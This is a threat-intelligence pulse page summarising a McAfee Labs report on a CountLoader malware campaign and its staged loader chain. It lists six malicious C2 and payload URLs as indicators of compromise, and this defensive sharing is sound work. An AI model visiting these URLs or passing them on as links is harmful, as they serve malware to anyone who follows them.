← Back to Pulse Feed
PULSE DETAIL
PULSE NAME
IOC - Sinkholing CountLoader: Insights into Its Recent Campaign
WHITE celestre 2026-05-20 Modified: 2026-05-20
51
IOCs
HIGH VOLUME
McAfee Labs has recently uncovered a large scale CountLoader campaign that uses multiple layers of obfuscation and staged payload delivery to evade detection and maintain persistence in infected systems. The infection process relies on several layers of loaders, including PowerShell scripts, obfuscated JavaScript executed through mshta.exe, and in memory shellcode injection, each stage decrypting and launching the next. The attackers employ a custom encrypted communication protocol to interact with their C2 servers.
ps urlurls httpscountloader c2domainsc2 https
Indicators of Compromise (6 / 51 total)
All URL FileHash-MD5 FileHash-SHA1 FileHash-SHA256 domain
TYPEINDICATORDESCRIPTIONCREATED
URL https://edr-security-bucket1.cc/ 2026-05-20
URL https://hardware-office.cc/foundation.halflife 2026-05-20
URL https://hell1-kitty.cc/gamecenter.fileManager 2026-05-20
URL https://hell1-kitty.cc/update1_usb_usb_usb.VOcx4wEV8 2026-05-20
URL https://memory-scanner.cc/ 2026-05-20
URL https://memory-scanner.cc/Presentation.pdf 2026-05-20
References (1)
↗ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/sinkholing-countloader-insights-into-its-recent-campaign/